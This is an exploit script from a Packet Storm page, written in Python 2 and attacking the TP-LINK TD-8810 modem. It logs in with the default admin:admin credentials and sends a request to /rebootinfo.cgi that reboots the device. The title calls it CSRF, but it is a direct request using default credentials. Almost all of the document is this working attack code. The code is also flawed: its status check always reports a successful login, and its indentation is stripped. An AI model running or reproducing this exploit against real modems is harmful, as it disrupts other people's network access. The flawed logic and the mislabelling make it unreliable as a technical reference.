TPLINK TD-8810 cross site request forgery exploit that performs a reboot of the modem.
09bdf9635bf9b63fb18e4c32a5a237cf878a16ea494b709ac969f658d874aa04#!/usr/bin/python
#
#[+]Exploit Title: TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
#[+]Date: 01\09\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: TD-8810
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
from socket import *
from time import sleep
from base64 import b64encode
import os,sys
if os.name == 'nt':
os.system("color 4f")
os.system("cls")
os.system("title TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit")
else:
os.system("clear")
print '''
TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
Created by C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Blog net-fuzzer.blogspot.com
'''
request = (
"GET / HTTP/1.1\r\n"
"Host: 192.168.1.1\r\n"
"User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n"
"Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: keep-alive\r\n"
"Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password
)
request2 = (
"GET /rebootinfo.cgi HTTP/1.1\r\n"
"Host: 192.168.1.1\r\n"
"User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n"
"Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: keep-alive\r\n"
"Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password
)
print "\t\t[+]Connecting in the Modem TP-LINK TD-8810..."
sleep(1)
s = socket(AF_INET,SOCK_STREAM,0)
s.connect(('192.168.1.1',80))
print "\t\t[+]Sending HTTP Request..."
sleep(1)
s.send(request)
data = s.recv(100000)
s.close()
if (int(data.split("\r\n")[0].split(" ")[1]) == "200") == 0:
print "\t\t[+]User Logged successfully."
sleep(1)
print "\t\t[+]Sending the request to shutdown the modem..."
sleep(1)
s = socket(AF_INET,SOCK_STREAM,0)
s.connect(('192.168.1.1',80))
s.send(request2)
print "\t\t[+]Exploit Sent wait your Modem Reboot... :)"
sleep(1)
s.close()
else:
print "\t\t[+]I can't log in your modem. Maybe Password Or Username is Wrong."
sleep(1)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed